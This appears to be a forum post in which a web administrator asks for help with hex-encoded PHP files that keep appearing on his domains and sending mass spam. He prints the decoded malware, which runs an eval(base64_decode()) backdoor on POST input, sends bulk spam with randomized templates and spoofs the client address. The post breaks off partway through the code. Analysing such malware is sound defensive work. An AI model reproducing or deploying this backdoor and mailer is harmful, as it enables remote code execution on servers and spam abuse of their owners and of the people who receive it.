I keep getting some random PHP files appearing in the public_html folder of a few different domains... These files are some how getting remotely uploaded and then being used to send mass spam.
I'm still doing some investigation, whether it's the code running the sites or a server security issue, or what ever... but I'm curious if anyone else has any experience with this?
I've decoded the latest PHP file (it was written in HEX) and if you wrote this? I officially hate you.
The cached original version is at http://ddecode.com/hexdecoder/?results=3233e0a58699c45573f2889109cfb31a
The decoded and formatted version is:
Any thoughts how I can prevent these files from appearing and sending mass spam???
I'm still doing some investigation, whether it's the code running the sites or a server security issue, or what ever... but I'm curious if anyone else has any experience with this?
I've decoded the latest PHP file (it was written in HEX) and if you wrote this? I officially hate you.
The cached original version is at http://ddecode.com/hexdecoder/?results=3233e0a58699c45573f2889109cfb31a
The decoded and formatted version is:
Code:
<?php
${"GLOBALS"}["mqlebyzvmj"] = "k";
${"GLOBALS"}["plfpgtb"] = "h_detected";
${"GLOBALS"}["gcjhotz"] = "headers";
${"GLOBALS"}["voftntvv"] = "res";
${"GLOBALS"}["yhdqjv"] = "data";
${"GLOBALS"}["beratloij"] = "v";
${"GLOBALS"}["wtdppktf"] = "cookie";
${"GLOBALS"}["mxbdjl"] = "request";
${"GLOBALS"}["fcqooern"] = "timeout";
${"GLOBALS"}["kqhynkswjz"] = "errstr";
${"GLOBALS"}["cksuzuqvwc"] = "errno";
${"GLOBALS"}["doljyffriysx"] = "fp";
${"GLOBALS"}["sxlttdn"] = "scheme";
${"GLOBALS"}["lvckjtabxs"] = "url";
${"GLOBALS"}["icgdbvfx"] = "params";
${"GLOBALS"}["qfeyefuqe"] = "uri";
${"GLOBALS"}["hqssdilo"] = "tokens";
${"GLOBALS"}["veppxwjrh"] = "str";
${"GLOBALS"}["hxkfxrxpenqh"] = "pass";
${"GLOBALS"}["sjukfuepbh"] = "length";
${"GLOBALS"}["uclidfi"] = "chars";
${"GLOBALS"}["apafoidgmzuu"] = "num";
${"GLOBALS"}["xscxjex"] = "count";
${"GLOBALS"}["nbnesbn"] = "rand";
${"GLOBALS"}["xfpfxyiictp"] = "max";
${"GLOBALS"}["dmlbmh"] = "min";
${"GLOBALS"}["apfobrq"] = "content";
${"GLOBALS"}["jisnvrn"] = "c2";
${"GLOBALS"}["fejuvwsrls"] = "ns";
${"GLOBALS"}["fybqbrtn"] = "i";
${"GLOBALS"}["lbolyfxnivk"] = "matches";
${"GLOBALS"}["bbvdpmjvhexf"] = "subj";
${"GLOBALS"}["vstpgeejdqiw"] = "to";
${"GLOBALS"}["uyhrcpj"] = "f";
${"GLOBALS"}["npbqykmfn"] = "un";
${"GLOBALS"}["xszxrwvmbo"] = "zag";
${"GLOBALS"}["kxrtvutigv"] = "plain";
${"GLOBALS"}["aqgqoaggxh"] = "head";
${"GLOBALS"}["zuusolg"] = "from";
${"GLOBALS"}["fvrlut"] = "messages";
${"GLOBALS"}["wdweims"] = "message";
${"GLOBALS"}["qwjrjo"] = "theme";
${"GLOBALS"}["kvijmeebjwjy"] = "filename";
${"GLOBALS"}["dsjfolgnodv"] = "file";
${"GLOBALS"}["ryqwhdlooof"] = "aliases";
${"GLOBALS"}["fgniwq"] = "mailers";
${"GLOBALS"}["ydxffto"] = "themes";
${"GLOBALS"}["cintvgc"] = "emails";
${"GLOBALS"}["byypcuyk"] = "key";
if (isset($_POST["code"]) && isset($_POST["custom_action"])) {
eval(base64_decode($_POST["code"]));
}
if (isset($_POST["type"]) && $_POST["type"] == "1") {
type1_send();
} elseif (isset($_POST["type"]) && $_POST["type"] == "2") {
} elseif (isset($_POST["type"])) {
echo $_POST["type"];
}
function type1_send( )
{
$escikxlrj = "messages";
${"GLOBALS"}["umdgowyukvx"] = "fteil";
if (!isset($_POST["emails"]) OR !isset($_POST["themes"]) OR !isset($_POST["messages"]) OR !isset($_POST["froms"]) OR !isset($_POST["mailers"])) {
exit( );
}
if (get_magic_quotes_gpc()) {
$pdniulpzjg = "post";
foreach ($_POST as ${${"GLOBALS"}["byypcuyk"]} => ${$pdniulpzjg}) {
$nnyfljh = "post";
$_POST[${${"GLOBALS"}["byypcuyk"]}] = stripcslashes(${$nnyfljh});
}
}
${"GLOBALS"}["lklrkotq"] = "emails";
${"GLOBALS"}["wcoqaksohrie"] = "froms";
$vuoyllxk = "passes";
$gajjboiolb = "email";
${${"GLOBALS"}["cintvgc"]} = @unserialize(base64_decode($_POST["emails"]));
${${"GLOBALS"}["ydxffto"]} = @unserialize(base64_decode($_POST["themes"]));
${$escikxlrj} = @unserialize(base64_decode($_POST["messages"]));
${${"GLOBALS"}["wcoqaksohrie"]} = @unserialize(base64_decode($_POST["froms"]));
${${"GLOBALS"}["fgniwq"]} = @unserialize(base64_decode($_POST["mailers"]));
${${"GLOBALS"}["ryqwhdlooof"]} = @unserialize(base64_decode($_POST["aliases"]));
${$vuoyllxk} = @unserialize(base64_decode($_POST["passes"]));
if (isset($_SERVER)) {
$_SERVER["PHP_SELF"] = "/";
$_SERVER["REMOTE_ADDR"] = "127.0.0.1";
if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$_SERVER["HTTP_X_FORWARDED_FOR"] = "127.0.0.1";
}
}
if (isset($_FILES)) {
foreach ($_FILES as ${${"GLOBALS"}["byypcuyk"]} => ${${"GLOBALS"}["dsjfolgnodv"]}) {
$tbmisfvl = "filename";
$vjfajwgqfgv = "aliases";
$zsigtbqc = "filename";
${"GLOBALS"}["tcvdyuooqtf"] = "filename";
${"GLOBALS"}["xespolekf"] = "filename";
${$tbmisfvl} = alter_macros(${$vjfajwgqfgv}[${${"GLOBALS"}["byypcuyk"]}]);
${${"GLOBALS"}["kvijmeebjwjy"]} = num_macros(${${"GLOBALS"}["xespolekf"]});
${$zsigtbqc} = text_macros(${${"GLOBALS"}["kvijmeebjwjy"]});
${"GLOBALS"}["zllrfyqlzd"] = "key";
${${"GLOBALS"}["tcvdyuooqtf"]} = xnum_macros(${${"GLOBALS"}["kvijmeebjwjy"]});
$_FILES[${${"GLOBALS"}["zllrfyqlzd"]}]["name"] = ${${"GLOBALS"}["kvijmeebjwjy"]};
}
}
if (empty(${${"GLOBALS"}["lklrkotq"]})) {
exit( );
}
foreach (${${"GLOBALS"}["cintvgc"]} as ${${"GLOBALS"}["umdgowyukvx"]} => ${$gajjboiolb}) {
${"GLOBALS"}["dumoukrytq"] = "theme";
${"GLOBALS"}["iiruieywjq"] = "message";
$wservwqqn = "theme";
${"GLOBALS"}["vsrutkuwiske"] = "from";
${${"GLOBALS"}["dumoukrytq"]} = ${${"GLOBALS"}["ydxffto"]}[array_rand(${${"GLOBALS"}["ydxffto"]})];
$vtzzcfh = "message";
${${"GLOBALS"}["qwjrjo"]} = alter_macros(${$wservwqqn}["theme"]);
$reskpoq = "mailers";
$qlddgikwl = "message";
$uzxokgywpz = "theme";
${${"GLOBALS"}["qwjrjo"]} = num_macros(${${"GLOBALS"}["qwjrjo"]});
${"GLOBALS"}["agqwsofchcw"] = "mailer";
${"GLOBALS"}["lhagsrk"] = "from";
${$uzxokgywpz} = text_macros(${${"GLOBALS"}["qwjrjo"]});
$zpddcmhvkqr = "messages";
${"GLOBALS"}["mbihuby"] = "message";
${"GLOBALS"}["sqqhlsnwuhy"] = "from";
${"GLOBALS"}["lvvmsotthrg"] = "message";
${${"GLOBALS"}["qwjrjo"]} = xnum_macros(${${"GLOBALS"}["qwjrjo"]});
${${"GLOBALS"}["wdweims"]} = ${$zpddcmhvkqr}[array_rand(${${"GLOBALS"}["fvrlut"]})];
${${"GLOBALS"}["wdweims"]} = alter_macros(${${"GLOBALS"}["wdweims"]}["message"]);
${${"GLOBALS"}["mbihuby"]} = num_macros(${${"GLOBALS"}["iiruieywjq"]});
$xngjqtj = "from";
${"GLOBALS"}["tvxnodjjy"] = "message";
$zvchak = "theme";
${${"GLOBALS"}["wdweims"]} = text_macros(${${"GLOBALS"}["lvvmsotthrg"]});
${"GLOBALS"}["ygtidolzyz"] = "mailer";
$zzmbjtetlro = "froms";
${"GLOBALS"}["fsnqten"] = "from";
${"GLOBALS"}["pusytimfhf"] = "froms";
${${"GLOBALS"}["tvxnodjjy"]} = xnum_macros(${$qlddgikwl});
${"GLOBALS"}["elqxcmdqx"] = "fteil";
${"GLOBALS"}["rwtkfsrf"] = "from";
${$vtzzcfh} = fteil_macros(${${"GLOBALS"}["wdweims"]}, ${${"GLOBALS"}["elqxcmdqx"]});
${${"GLOBALS"}["sqqhlsnwuhy"]} = ${${"GLOBALS"}["pusytimfhf"]}[array_rand(${$zzmbjtetlro})];
$hhmertb = "from";
${${"GLOBALS"}["fsnqten"]} = alter_macros(${${"GLOBALS"}["rwtkfsrf"]}["from"]);
${"GLOBALS"}["snqullqgcsf"] = "email";
${${"GLOBALS"}["vsrutkuwiske"]} = num_macros(${${"GLOBALS"}["zuusolg"]});
${${"GLOBALS"}["zuusolg"]} = text_macros(${${"GLOBALS"}["zuusolg"]});
${${"GLOBALS"}["zuusolg"]} = xnum_macros(${$xngjqtj});
${${"GLOBALS"}["lhagsrk"]} = from_host(${$hhmertb});
${${"GLOBALS"}["ygtidolzyz"]} = ${$reskpoq}[array_rand(${${"GLOBALS"}["fgniwq"]})];
send_mail(${${"GLOBALS"}["zuusolg"]}, ${${"GLOBALS"}["snqullqgcsf"]}, ${$zvchak}, ${${"GLOBALS"}["wdweims"]}, ${${"GLOBALS"}["agqwsofchcw"]});
}
}
function send_mail($from, $to, $subj, $text, $mailer)
{
${"GLOBALS"}["qkeivd"] = "head";
${"GLOBALS"}["uvndnu"] = "head";
$qapomxejc = "head";
${"GLOBALS"}["qydrmrm"] = "un";
$ssjdvmr = "head";
${"GLOBALS"}["qapalf"] = "un";
${"GLOBALS"}["fbmjilbxuh"] = "un";
${${"GLOBALS"}["qkeivd"]} = "";
${${"GLOBALS"}["qydrmrm"]} = strtoupper(uniqid(time()));
${"GLOBALS"}["pihghp"] = "plain";
${"GLOBALS"}["tiovdug"] = "head";
$zftiytqlm = "un";
$dvusopo = "zag";
${$qapomxejc} .= "From: $from\n";
${${"GLOBALS"}["aqgqoaggxh"]} .= "X-Mailer: $mailer\n";
${"GLOBALS"}["xnacnkv"] = "zag";
${${"GLOBALS"}["aqgqoaggxh"]} .= "Reply-To: $from\n";
${${"GLOBALS"}["tiovdug"]} .= "Mime-Version: 1.0\n";
${${"GLOBALS"}["aqgqoaggxh"]} .= "Content-Type: multipart/alternative;";
${"GLOBALS"}["hdxvdvoguu"] = "text";
${${"GLOBALS"}["uvndnu"]} .= "boundary=\"----------" . ${${"GLOBALS"}["fbmjilbxuh"]} . "\"\n\n";
${${"GLOBALS"}["kxrtvutigv"]} = strip_tags(${${"GLOBALS"}["hdxvdvoguu"]});
$udgbrojukp = "zag";
${${"GLOBALS"}["xszxrwvmbo"]} = "------------" . ${${"GLOBALS"}["npbqykmfn"]} . "\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
${"GLOBALS"}["aumnkos"] = "zag";
${$udgbrojukp} .= "Content-Transfer-Encoding: 7bit\n\n" . ${${"GLOBALS"}["pihghp"]} . "\n\n";
${${"GLOBALS"}["xszxrwvmbo"]} .= "------------" . ${${"GLOBALS"}["qapalf"]} . "\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
${$dvusopo} .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
${${"GLOBALS"}["aumnkos"]} .= "------------" . ${$zftiytqlm} . "--";
if (count($_FILES) > 0) {
foreach ($_FILES as ${${"GLOBALS"}["dsjfolgnodv"]}) {
if (file_exists(${${"GLOBALS"}["dsjfolgnodv"]}["tmp_name"])) {
$csikbuoamv = "un";
${"GLOBALS"}["jqtmtga"] = "zag";
${"GLOBALS"}["jesjxulxr"] = "f";
$sdddwyyfvp = "zag";
$bfwodwiv = "file";
${${"GLOBALS"}["jesjxulxr"]} = fopen(${$bfwodwiv}["tmp_name"], "rb");
${${"GLOBALS"}["xszxrwvmbo"]} .= "------------" . ${$csikbuoamv} . "\n";
${$sdddwyyfvp} .= "Content-Type: application/octet-stream;";
${${"GLOBALS"}["xszxrwvmbo"]} .= "name=\"" . ${${"GLOBALS"}["dsjfolgnodv"]}["name"] . "\"\n";
${"GLOBALS"}["dmdmxmo"] = "zag";
${${"GLOBALS"}["dmdmxmo"]} .= "Content-Transfer-Encoding:base64\n";
$wfchmf = "file";
${${"GLOBALS"}["xszxrwvmbo"]} .= "Content-Disposition:attachment;";
${${"GLOBALS"}["jqtmtga"]} .= "filename=\"" . ${${"GLOBALS"}["dsjfolgnodv"]}["name"] . "\"\n\n";
${${"GLOBALS"}["xszxrwvmbo"]} .= chunk_split(base64_encode(fread(${${"GLOBALS"}["uyhrcpj"]}, filesize(${$wfchmf}["tmp_name"])))) . "\n";
fclose(${${"GLOBALS"}["uyhrcpj"]});
}
}
}
if (@mail(${${"GLOBALS"}["vstpgeejdqiw"]}, ${${"GLOBALS"}["bbvdpmjvhexf"]}, ${${"GLOBALS"}["xnacnkv"]}, ${$ssjdvmr})) {
if (!empty($_POST["verbose"]))
echo "SENDED";
} else {
if (!empty($_POST["verbose"]))
echo "FAIL";
}
}
function alter_macros($content)
{
$gfhdwrlfdbti = "content";
$dbcqzuqfrub = "i";
$vljvwysj = "matches";
preg_match_all("#{(.*)}#Ui", ${$gfhdwrlfdbti}, ${${"GLOBALS"}["lbolyfxnivk"]});
for (${$dbcqzuqfrub} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${$vljvwysj}[1]); ${${"GLOBALS"}["fybqbrtn"]}++) {
$xkjlspskvkc = "rand";
${"GLOBALS"}["smqdfvdld"] = "content";
$nglxiujbxb = "ns";
${${"GLOBALS"}["fejuvwsrls"]} = explode("|", ${${"GLOBALS"}["lbolyfxnivk"]}[1][${${"GLOBALS"}["fybqbrtn"]}]);
${${"GLOBALS"}["jisnvrn"]} = count(${$nglxiujbxb});
${"GLOBALS"}["kkdlher"] = "rand";
${$xkjlspskvkc} = rand(0, (${${"GLOBALS"}["jisnvrn"]} - 1));
${${"GLOBALS"}["apfobrq"]} = str_replace("{" . ${${"GLOBALS"}["lbolyfxnivk"]}[1][${${"GLOBALS"}["fybqbrtn"]}] . "}", ${${"GLOBALS"}["fejuvwsrls"]}[${${"GLOBALS"}["kkdlher"]}], ${${"GLOBALS"}["smqdfvdld"]});
}
return ${${"GLOBALS"}["apfobrq"]};
}
function text_macros($content)
{
$cgfmcd = "content";
$bdxuity = "i";
${"GLOBALS"}["pcscgpyj"] = "matches";
$ktojmubhbi = "i";
$lxkysix = "i";
$ujoqcftky = "matches";
preg_match_all("#\\[TEXT\\-([[:digit:]]+)\-([[:digit:]]+)\\]#", ${$cgfmcd}, ${${"GLOBALS"}["pcscgpyj"]});
for (${$bdxuity} = 0; ${$ktojmubhbi} < count(${${"GLOBALS"}["lbolyfxnivk"]}[0]); ${${"GLOBALS"}["fybqbrtn"]}++) {
$prmvjorstbht = "matches";
$qdzyect = "min";
${"GLOBALS"}["ycnufusujl"] = "word";
$xksiek = "i";
${${"GLOBALS"}["dmlbmh"]} = ${$prmvjorstbht}[1][${${"GLOBALS"}["fybqbrtn"]}];
${${"GLOBALS"}["xfpfxyiictp"]} = ${${"GLOBALS"}["lbolyfxnivk"]}[2][${${"GLOBALS"}["fybqbrtn"]}];
$spewortenoy = "rand";
$wmnpnrq = "word";
${$spewortenoy} = rand(${$qdzyect}, ${${"GLOBALS"}["xfpfxyiictp"]});
${"GLOBALS"}["pyiajtc"] = "content";
${"GLOBALS"}["eurlpqt"] = "matches";
${$wmnpnrq} = generate_word(${${"GLOBALS"}["nbnesbn"]});
${${"GLOBALS"}["pyiajtc"]} = preg_replace("/" . preg_quote(${${"GLOBALS"}["eurlpqt"]}[0][${$xksiek}]) . "/", ${${"GLOBALS"}["ycnufusujl"]}, ${${"GLOBALS"}["apfobrq"]}, 1);
}
preg_match_all("#\\[TEXT\-([[:digit:]]+)\]#", ${${"GLOBALS"}["apfobrq"]}, ${$ujoqcftky});
for (${$lxkysix} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${${"GLOBALS"}["lbolyfxnivk"]}[0]); ${${"GLOBALS"}["fybqbrtn"]}++) {
${"GLOBALS"}["lrxaolsi"] = "content";
$osbpusol = "word";
$uhqpielodxx = "matches";
${${"GLOBALS"}["xscxjex"]} = ${$uhqpielodxx}[1][${${"GLOBALS"}["fybqbrtn"]}];
${$osbpusol} = generate_word(${${"GLOBALS"}["xscxjex"]});
$mgvbrau = "word";
${${"GLOBALS"}["lrxaolsi"]} = preg_replace("/" . preg_quote(${${"GLOBALS"}["lbolyfxnivk"]}[0][${${"GLOBALS"}["fybqbrtn"]}]) . "/", ${$mgvbrau}, ${${"GLOBALS"}["apfobrq"]}, 1);
}
return ${${"GLOBALS"}["apfobrq"]};
}
function xnum_macros($content)
{
$pzpyjuxcpiy = "matches";
$xfajaeff = "matches";
${"GLOBALS"}["kioebekqiev"] = "i";
preg_match_all("#\[NUM\-([[:digit:]]+)\]#", ${${"GLOBALS"}["apfobrq"]}, ${$pzpyjuxcpiy});
for (${${"GLOBALS"}["fybqbrtn"]} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${$xfajaeff}[0]); ${${"GLOBALS"}["kioebekqiev"]}++) {
${"GLOBALS"}["wnnooc"] = "matches";
${"GLOBALS"}["visitosnublp"] = "max";
${"GLOBALS"}["whlqjtoorf"] = "num";
${"GLOBALS"}["dmtfnwxztf"] = "i";
${"GLOBALS"}["ewkbmqodngo"] = "num";
${"GLOBALS"}["bmiuypczak"] = "i";
${${"GLOBALS"}["whlqjtoorf"]} = ${${"GLOBALS"}["wnnooc"]}[1][${${"GLOBALS"}["bmiuypczak"]}];
${"GLOBALS"}["oddzvpwlnl"] = "rand";
${${"GLOBALS"}["dmlbmh"]} = pow(10, ${${"GLOBALS"}["ewkbmqodngo"]} - 1);
${"GLOBALS"}["hlcslifsb"] = "content";
${${"GLOBALS"}["visitosnublp"]} = pow(10, ${${"GLOBALS"}["apafoidgmzuu"]}) - 1;
${${"GLOBALS"}["oddzvpwlnl"]} = rand(${${"GLOBALS"}["dmlbmh"]}, ${${"GLOBALS"}["xfpfxyiictp"]});
${${"GLOBALS"}["hlcslifsb"]} = str_replace(${${"GLOBALS"}["lbolyfxnivk"]}[0][${${"GLOBALS"}["dmtfnwxztf"]}], ${${"GLOBALS"}["nbnesbn"]}, ${${"GLOBALS"}["apfobrq"]});
}
return ${${"GLOBALS"}["apfobrq"]};
}
function num_macros($content)
{
${"GLOBALS"}["ahxqhqnxa"] = "matches";
$uwpgtyucowo = "i";
$amtlvbxk = "content";
${"GLOBALS"}["oovbkvy"] = "matches";
${"GLOBALS"}["vxenbwwpdwql"] = "i";
preg_match_all("#\[RAND\\-([[:digit:]]+)\\-([[:digit:]]+)\\]#", ${$amtlvbxk}, ${${"GLOBALS"}["ahxqhqnxa"]});
for (${${"GLOBALS"}["vxenbwwpdwql"]} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${${"GLOBALS"}["oovbkvy"]}[0]); ${$uwpgtyucowo}++) {
$yyofcdnu = "matches";
${"GLOBALS"}["kzvejtns"] = "content";
$alqgklf = "min";
$wdwojkxjn = "max";
$auhylbfw = "max";
$oqgcwrpw = "matches";
${${"GLOBALS"}["dmlbmh"]} = ${$yyofcdnu}[1][${${"GLOBALS"}["fybqbrtn"]}];
${$auhylbfw} = ${${"GLOBALS"}["lbolyfxnivk"]}[2][${${"GLOBALS"}["fybqbrtn"]}];
${"GLOBALS"}["gqhkqoj"] = "content";
${"GLOBALS"}["vqchgwrteuxr"] = "rand";
${${"GLOBALS"}["nbnesbn"]} = rand(${$alqgklf}, ${$wdwojkxjn});
${${"GLOBALS"}["gqhkqoj"]} = str_replace(${$oqgcwrpw}[0][${${"GLOBALS"}["fybqbrtn"]}], ${${"GLOBALS"}["vqchgwrteuxr"]}, ${${"GLOBALS"}["kzvejtns"]});
}
return ${${"GLOBALS"}["apfobrq"]};
}
function generate_word($length)
{
${"GLOBALS"}["fudsysewwc"] = "chars";
${"GLOBALS"}["avqhwnqfh"] = "string";
${${"GLOBALS"}["uclidfi"]} = "abcdefghijklmnopqrstuvyxz";
${"GLOBALS"}["nytrgfbulv"] = "string";
$hwgkscqhbog = "numChars";
${"GLOBALS"}["nhlcrv"] = "i";
${$hwgkscqhbog} = strlen(${${"GLOBALS"}["fudsysewwc"]});
$czmeeowy = "i";
${${"GLOBALS"}["nytrgfbulv"]} = "";
for (${${"GLOBALS"}["nhlcrv"]} = 0; ${$czmeeowy} < ${${"GLOBALS"}["sjukfuepbh"]}; ${${"GLOBALS"}["fybqbrtn"]}++) {
$cbktgugg = "string";
${"GLOBALS"}["yhutyoyarhu"] = "chars";
$axigcqowche = "numChars";
${$cbktgugg} .= substr(${${"GLOBALS"}["yhutyoyarhu"]}, rand(1, ${$axigcqowche}) - 1, 1);
}
return ${${"GLOBALS"}["avqhwnqfh"]};
}
function pass_macros($content, $passes)
{
$dkntfvhb = "passes";
${${"GLOBALS"}["hxkfxrxpenqh"]} = array_pop(${$dkntfvhb});
return str_replace("[PASS]", ${${"GLOBALS"}["hxkfxrxpenqh"]}, ${${"GLOBALS"}["apfobrq"]});
}
function fteil_macros($content, $fteil)
{
$qbjfquydtw = "fteil";
return str_replace("[FTEIL]", ${$qbjfquydtw}, ${${"GLOBALS"}["apfobrq"]});
}
function is_ip($str)
{
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}\$/", ${${"GLOBALS"}["veppxwjrh"]});
}
function from_host($content)
{
$msfgiloyj = "tokens";
$host = preg_replace("/^(www|ftp)\\./i", "", @$_SERVER["HTTP_HOST"]);
if (is_ip($host)) {
${"GLOBALS"}["ridbpirb"] = "content";
return ${${"GLOBALS"}["ridbpirb"]};
}
${${"GLOBALS"}["hqssdilo"]} = explode("@", ${${"GLOBALS"}["apfobrq"]});
${${"GLOBALS"}["apfobrq"]} = ${$msfgiloyj}[0] . "@" . $host . ">";
return ${${"GLOBALS"}["apfobrq"]};
}
function error_404( )
{
$duvztk = "uri";
${${"GLOBALS"}["qfeyefuqe"]} = preg_replace("/(\\?).*\$/", "", $_SERVER["REQUEST_URI"]);
${${"GLOBALS"}["apfobrq"]} = http_request("http://" . $_SERVER["SERVER_NAME"] . "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
${${"GLOBALS"}["apfobrq"]} = str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", ${$duvztk}, ${${"GLOBALS"}["apfobrq"]});
exit(${${"GLOBALS"}["apfobrq"]});
}
function http_request($params)
{
${"GLOBALS"}["nenohx"] = "params";
${"GLOBALS"}["nwhkkxfzcy"] = "params";
${"GLOBALS"}["mqldimwdu"] = "url";
if (!is_array(${${"GLOBALS"}["nwhkkxfzcy"]})) {
${${"GLOBALS"}["icgdbvfx"]} = array(
"url" => ${${"GLOBALS"}["icgdbvfx"]},
"method" => "GET"
);
}
${"GLOBALS"}["vxijvekzi"] = "params";
${"GLOBALS"}["rghyshvrgwe"] = "url";
${"GLOBALS"}["xyqxtbcoivz"] = "params";
${"GLOBALS"}["mqghnsid"] = "params";
${"GLOBALS"}["whbkdajncyf"] = "url";
$qsvullrdgijh = "params";
${"GLOBALS"}["hpypjxrcfb"] = "url";
if (${${"GLOBALS"}["icgdbvfx"]}["url"] == "")
return FALSE;
$kartldnrdvp = "params";
${"GLOBALS"}["kdksoxo"] = "params";
${"GLOBALS"}["hrixbsdqcqma"] = "res";
if (!isset(${${"GLOBALS"}["nenohx"]}["method"]))
${${"GLOBALS"}["icgdbvfx"]}["method"] = (isset(${${"GLOBALS"}["icgdbvfx"]}["data"]) && is_array(${${"GLOBALS"}["kdksoxo"]}["data"])) ? "POST" : "GET";
$tdngrnnmlr = "url";
${${"GLOBALS"}["vxijvekzi"]}["method"] = strtoupper(${${"GLOBALS"}["xyqxtbcoivz"]}["method"]);
${"GLOBALS"}["yrfwkkspku"] = "url";
$nwpfhvrsqvj = "port";
if (!in_array(${$qsvullrdgijh}["method"], array(
"GET",
"POST"
)))
return FALSE;
$ihxnlfpxdfd = "url";
$lbspexnjsw = "url";
$wgzlvxqfjizw = "url";
${${"GLOBALS"}["lvckjtabxs"]} = parse_url(${${"GLOBALS"}["icgdbvfx"]}["url"]);
if (!isset(${${"GLOBALS"}["rghyshvrgwe"]}["scheme"]))
${${"GLOBALS"}["mqldimwdu"]}["scheme"] = "http";
if (!isset(${${"GLOBALS"}["hpypjxrcfb"]}["path"]))
${$lbspexnjsw}["path"] = "/";
if (!isset(${${"GLOBALS"}["whbkdajncyf"]}["host"]) && isset(${$tdngrnnmlr}["path"])) {
if (strpos(${${"GLOBALS"}["lvckjtabxs"]}["path"], "/")) {
$dwjvillu = "url";
${"GLOBALS"}["xthjzxk"] = "url";
${$dwjvillu}["host"] = substr(${${"GLOBALS"}["lvckjtabxs"]}["path"], 0, strpos(${${"GLOBALS"}["lvckjtabxs"]}["path"], "/"));
${${"GLOBALS"}["lvckjtabxs"]}["path"] = substr(${${"GLOBALS"}["lvckjtabxs"]}["path"], strpos(${${"GLOBALS"}["xthjzxk"]}["path"], "/"));
} else {
${"GLOBALS"}["kecbnuqkw"] = "url";
$dxnxasp = "url";
${${"GLOBALS"}["lvckjtabxs"]}["host"] = ${${"GLOBALS"}["kecbnuqkw"]}["path"];
${$dxnxasp}["path"] = "/";
}
}
${"GLOBALS"}["srhbwqvfli"] = "url";
${"GLOBALS"}["krcdefut"] = "res";
${${"GLOBALS"}["yrfwkkspku"]}["path"] = preg_replace("/[\/]+/", "/", ${${"GLOBALS"}["lvckjtabxs"]}["path"]);
$ktskyr = "timeout";
$ggyovxibtno = "url";
$pmcvjns = "headers";
if (isset(${$wgzlvxqfjizw}["query"]))
${${"GLOBALS"}["lvckjtabxs"]}["path"] .= "?{$url['query']}";
${"GLOBALS"}["llokaqyxtv"] = "url";
$fdgdljzhrg = "port";
${$nwpfhvrsqvj} = isset(${${"GLOBALS"}["icgdbvfx"]}["port"]) ? ${${"GLOBALS"}["icgdbvfx"]}["port"] : (isset(${$ggyovxibtno}["port"]) ? ${$ihxnlfpxdfd}["port"] : (${${"GLOBALS"}["lvckjtabxs"]}["scheme"] == "https" ? 443 : 80));
${$ktskyr} = isset(${${"GLOBALS"}["icgdbvfx"]}["timeout"]) ? ${${"GLOBALS"}["mqghnsid"]}["timeout"] : 30;
if (!isset(${${"GLOBALS"}["icgdbvfx"]}["return"]))
${$kartldnrdvp}["return"] = "content";
${${"GLOBALS"}["sxlttdn"]} = ${${"GLOBALS"}["llokaqyxtv"]}["scheme"] == "https" ? "ssl://" : "";
${${"GLOBALS"}["doljyffriysx"]} = @fsockopen(${${"GLOBALS"}["sxlttdn"]} . ${${"GLOBALS"}["srhbwqvfli"]}["host"], ${$fdgdljzhrg}, ${${"GLOBALS"}["cksuzuqvwc"]}, ${${"GLOBALS"}["kqhynkswjz"]}, ${${"GLOBALS"}["fcqooern"]});
if (${${"GLOBALS"}["doljyffriysx"]}) {
${"GLOBALS"}["szyxqtzcz"] = "fp";
${"GLOBALS"}["ysihoboxrlp"] = "params";
${"GLOBALS"}["wsxrgoan"] = "fp";
${"GLOBALS"}["ijrhgmjp"] = "request";
$rnwvskue = "params";
if (!isset(${${"GLOBALS"}["icgdbvfx"]}["User-Agent"]))
${$rnwvskue}["User-Agent"] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
${"GLOBALS"}["dwbzzzujges"] = "request";
${"GLOBALS"}["ihvknvh"] = "fp";
${"GLOBALS"}["reqvhywjsyc"] = "request";
${${"GLOBALS"}["ijrhgmjp"]} = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
${${"GLOBALS"}["dwbzzzujges"]} .= "Host: {$url['host']}\r\n";
$ksctlofbdv = "params";
$gjvppir = "request";
${${"GLOBALS"}["mxbdjl"]} .= "User-Agent: {$params['User-Agent']}" . "\r\n";
if (isset(${$ksctlofbdv}["referer"]))
${$gjvppir} .= "Referer: {$params['referer']}\r\n";
if (isset(${${"GLOBALS"}["ysihoboxrlp"]}["cookie"])) {
$ztssvlnv = "params";
${${"GLOBALS"}["wtdppktf"]} = "";
$qnmqlxq = "cookie";
if (is_array(${$ztssvlnv}["cookie"])) {
${"GLOBALS"}["osiiuvji"] = "k";
${"GLOBALS"}["bisylu"] = "cookie";
$btalunrwhiv = "params";
$eotrwnlnuut = "cookie";
foreach (${$btalunrwhiv}["cookie"] as ${${"GLOBALS"}["osiiuvji"]} => ${${"GLOBALS"}["beratloij"]})
${$eotrwnlnuut} .= "$k=$v; ";
${${"GLOBALS"}["bisylu"]} = substr(${${"GLOBALS"}["wtdppktf"]}, 0, -2);
} else
${${"GLOBALS"}["wtdppktf"]} = ${${"GLOBALS"}["icgdbvfx"]}["cookie"];
$tiwbwbgch = "request";
if (${$qnmqlxq} != "")
${$tiwbwbgch} .= "Cookie: $cookie\r\n";
}
${"GLOBALS"}["wfcqsum"] = "request";
$dpnkqsgbmss = "params";
${${"GLOBALS"}["reqvhywjsyc"]} .= "Connection: close\r\n";
$rrgdjfvkdzd = "params";
if (${$dpnkqsgbmss}["method"] == "POST") {
$bdrehri = "data";
if (isset(${${"GLOBALS"}["icgdbvfx"]}["data"]) && is_array(${${"GLOBALS"}["icgdbvfx"]}["data"])) {
$egwwjfvmn = "k";
${"GLOBALS"}["theexecgcpc"] = "data";
${"GLOBALS"}["qsvwagufkq"] = "v";
$fkqgohlfyhme = "data";
